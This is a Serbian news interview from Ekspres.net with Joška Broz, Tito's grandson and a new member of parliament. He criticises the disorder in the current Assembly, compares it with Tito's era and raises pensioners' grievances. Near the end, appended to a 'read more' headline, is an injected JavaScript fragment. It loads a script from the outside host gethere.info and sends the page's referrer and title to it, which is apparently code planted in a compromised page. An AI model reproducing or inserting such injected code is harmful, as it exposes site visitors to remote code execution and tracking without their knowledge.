Politika
07.06.2016. 06:58
ekspres

INTERVJU, BROZ: Skupština je za vreme Tita bila ozbiljna institucija, ovo sada je farsa

Ekspres.net
Izvor: Ekspres.net

Mislio sam da je ovo narodna, a ovo izgleda kao Skupština pojedinaca koji terorišu ostale poslanike svojim nekim pričama. Kažu da su gospoda, a u petak su na prvoj sednici pokazali kolika su gospoda.

Predsednik Komunističke partije Srbije i unuk doživotnog predsednika bivše Jugoslavije Josipa Broza Tita, Joška Broz sada je i poslanik u Narodnoj Skupštini, gde je na listi koalicije SPS-JS-Zeleni dobio jedan poslanički mandat. Titov unuk posle prvog radnog dana u Skupštini u intervjuu za Ekspres.net kaže da je najviše iznenađen ponašanjem poslanika i da su u vreme njegovog dede i Skupština i država bile ozbiljne, dok je "sada Skupština farsa, a državu nemamo".

EKSPRES: Iako ste se tek 2005. godine politički aktivirali, politika vam sigurno nije bila strana ni ranije, jer ste odrasli kao unuk najmoćnijeg državnika na ovim prostorima. Međutim, sada ste se našli u potpuno novoj ulozi, kako se osećate kao poslanik?

-Interesantno je da, iako mi je prvi poslanički mandat, ovo mi nije i prvi posao u Skupštini. Moje prvo radno mesto kada sam se zaposlio 1976. godine bilo je u Skupštini. Pošto sam dobio posao u MUP-u, dok su mi tražili adekvatno radno mesto, raspoređen sam u Narodnu Skupštinu, u Službu obezbeđenja. A kao poslanik, da Vam iskreno kažem - osećam se malo iznenađeno. Mislio sam da je ovo narodna, a ovo izgleda kao Skupština pojedinaca koji terorišu sve ostale poslanike svojim nekim pričama. Kažu da su gospoda, a u petak su na prvoj sednici pokazali kolika su gospoda.

_SDZ1574Iako mi je prvi poslanički mandat, ovo mi nije i prvi posao u Skupštini. Zaposlio sam se u policiji 1976. i raspoređen u obezbeđenje parlamenta

EKSPRES: Čime ste najviše iznenađeni? Šta nije onako kako ste zamišljali?

-Mislio sam da ova Skupština treba što pre da reši tehnička pitanja, a to je izbor predsednice, radnih tela i foruma, da bismo počeli da radimo. Ako diskusija o tome što bi trebalo da se najbrže završi traje beskonačno, koliko će onda trajati diskusija kada budemo raspravljali o deci, omladini, penzionerima, poljoprivrednicima? Ovde se koristi skupštinska dvorana samo za prepucavanje, "ovaj je lopov, ovaj ukrao ovo, ovaj ono". Biramo predsednicu Skupštine, a raspravljamo o fantomkama i privatizaciji. A ovo prepucavanje košta građane, seljake u Vojvodini koji čekaju subvencije, jer sve to stoji. Evo vam konkretno primer moje ćerke i škole "Svetozar Marković" na Vračaru. Škola je počela da se renovira, onda je to stalo zbog izbora i sada ne mogu da se dogovore ko je počeo, ko će da završi, a deca idu pet kilometra dalje u drugu školu. Sve se lupa po glavi naroda. Pa, dokle više?!

EKSPRES: Gledali smo do sada svašta u Parlamentu. Bilo je polivanja vodom, uvreda, kletvi, čupanja kablova, neke su iznosili...Šta očekujete u ovom sazivu?

- Kako je krenulo čini mi se da će ova Skupština biti još gora nego sve prethodne čije prenose sam pratio na televiziji.

joska brozVoja Šešelj, iako je radikal, u dobrim je odnosima sa mnom. Bio je u kući mog oca, poštuje me i normalno da i ja njega poštujem

EKSPRES: Bili ste mladi kada je Vaš deda bio na čelu države, ali i dovoljno odrasli da možete da uporedite Skupštinu iz tog vremena i sada?

-U vreme kada je Jugoslavijom vladao moj deda Josip Broz Tito u Skupštini su stvarno sedeli gospoda poslanici, a sada smo pokazali koliko smo daleko od gospode. Tada se mnogo efikasnije radilo, a sada imamo šesnaest poslaničkih grupa koje nikako ne mogu da se dogovore. Danas svi koriste govornicu da bi se lično vređali, a tada se odlučivalo o stvarima koje su bile za dobro naroda, za bolji život građana. Tada smo na četiri zaposlena imali jednog penzionera, bili smo ozbiljna država. Kada to budemo opet imali, opet ćemo imati državu. Ovo je sve farsa, prepucavanje, prazne priče, politički marketing... Ja to ne mogu da shvatim. Nisam zbog toga došao u Skupštinu. Došao sam da se trudim da vratimo u sistem ono što je pozitivno, a to je besplatno zdravstvo, besplatno školstvo, vojska, nezavisna policija, nezavisno sudstvo...

PROČITAJTE JOŠ:
PRVE DAME, JOVANKA BROZ: Lička partizanka koja je donela holivudski glamur u Jugoslaviju (FOTO)

EKSPRES: S obzirom na poreklo i prezime, kako su vas prihvatili kolege poslanici, posebno oni koji pripadaju desnim političkim opcijama?

-Ja sam odrastao u ovom gradu i mnoge od ovih ljudi poznajem, sa mnogima sam u dobrim odnosima bez obzira na političke opcije koje zastupaju. Evo i Voja Šešelj, iako je radikal, u dobrim je odnosima sa mnom. Bio je u kući mog oca, poštuje me i normalno da i ja njega poštujem.

EKSPRES: Kad već pominjemo Šešelja, on se posle dužeg vremena vratio u Skupštinu, a tu su i Čanak i muftija Zukorlić, koji su poznati kao politički skandal majstori. Sa kime biste mogli da dođete u konflikt?

-Po prirodi nisam konfliktna ličnost, nisam sklon incidentima i ne vidim razloga da bih sa bilo kim imao neki konflikt ovde u Skupštini, osim ako me neko ne bude prozivao zbog porodice. To sigurno neću dozvoliti, ući ću u duel sa svakim, ko god to bio.

EKSPRES: Da li mislite da to može da se izbegne kad su Vas već na prvoj sednici iskoristili za međusobno prepucavanje Šešelj i Martinović iz SNS-a?

-Pa jeste, Martinović je prozivao Šešelja koristeći mene kao izgovor, ali ja nisam imao potrebe da odgovorim jer je Voja odgovorio i to vrlo korektno, i svaka mu čast zbog toga. U svakom slučaju, neću dozvoliti da mi napadaju prezime. Neću nikoga napadati. Ali sigurno ću da ih podsećam da ono što su obećali u predizbornoj kampanji ispune. A svi su obećali osim nas. Mi smo rekli da ćemo se truditi da poboljšamo uslove za život građana, a svi drugi su obećavali i besplatno školstvo i zdravstvo i uspon privrede, a to su priče za malu decu.

EKSPRES: Šta se promenilo u Skupštini otkada ste poslednji put bili ovde?

-Nije se ništa posebno promenilo. Sve su to manje više iste kancelarije, možda malo renovirane posle one paljevine 5.oktobra 2000., ali sala ko sala, prima sve koji uđu, to je najgora stvar. Ne vidim perspektivu ovakvog skupštinskog rada. Kako da rešimo životne stvari, problem penzionera koji od svojih penzija ne mogu da žive. Pa ja sam posle 56 godina efektivnog rada dobio minimalnu penziju, a onda su me pre neki dan zvali iz PIO Fonda i rekli da potpišem da je sve ono što mi nisu isplaćivali zastarelo(?!). Država sa penzionerima radi šta hoće, a u predizbornim kampanjama daju prazna obećanja. To pitanje oko penzija ću da postavim čim počnemo sa radom.

Ekspres.net
Izvor: Ekspres.netEkspres.net
Nije dočekao da vidi unuka u Skupštini: Josip Broz Tito

Deda zna da sam ja nagao, ali da imam rezona i sigurno bi se složio sa svim onim što planiram da uradim kao narodni poslanik.

EKSPRES: Da li ćete smeti da postavite to pitanje ako Vaša koalicija bude deo vladajuće većine?

-Bez obzira da li ćemo da budemo u Vladi ili opoziciji ja da ćutim neću. Ja sam ovde došao kao komunista i moj cilj je da se kao komunista borim za dobro naroda.

EKSPRES: Šta bi Vam deda rekao danas da je živ i da može da Vas vidi na ovoj poziciji?

-On zna da sam ja nagao, ali da rezonski razmišljam i sigurno bi se složio sa svim onim što planiram da uradim kao narodni poslanik.

PROČITAJTE JOŠ:
ISPOVEST TITOVOG LEKARA: Broz bi duže živeo da smo poslušali Amerikance umesto Rusa

SREMSKI FRONT, POLEMIKA: Najveća ratna pobeda ili nepotrebna klanica u trenutku kada je rat već bio završen?s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
27°C
27.06.2022.
Beograd

Najnovije

Vidi sve

Najčitanije

Vidi sve

Iz drugačijeg ugla

Vidi sve